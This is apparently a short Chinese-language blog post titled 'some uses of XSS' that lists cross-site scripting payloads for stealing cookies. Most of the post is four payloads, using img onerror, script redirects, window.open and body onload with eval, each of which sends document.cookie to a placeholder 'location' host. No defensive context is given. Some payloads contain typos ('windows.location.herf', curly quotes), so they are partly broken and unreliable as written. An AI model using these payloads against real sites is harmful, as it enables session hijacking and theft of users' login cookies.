XSS 的一些用法
XSS漏洞是往网页里面注入JS代码,然后让浏览器执行
偷Cookie
<img>
标签
1 | <img src=x onerror = document.body.appendChild(document.createElement('img')).setAttribute('src','location/?='+document.cookie); > |
<script>
标签
重定向链接到 herf:
1 | <script>windows.location.herf='location/?cookie='+document.cookie</script> |
新窗口打开链接:
1 | <script>window.open('location/?cookie='+document.cookie)</script> |
<body>
标签
1 | <body onload=eval(“document.body.appendChild(document.createElement('img')).setAttribute('src','location?='+document.cookie);”)></body> |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Xorex!
评论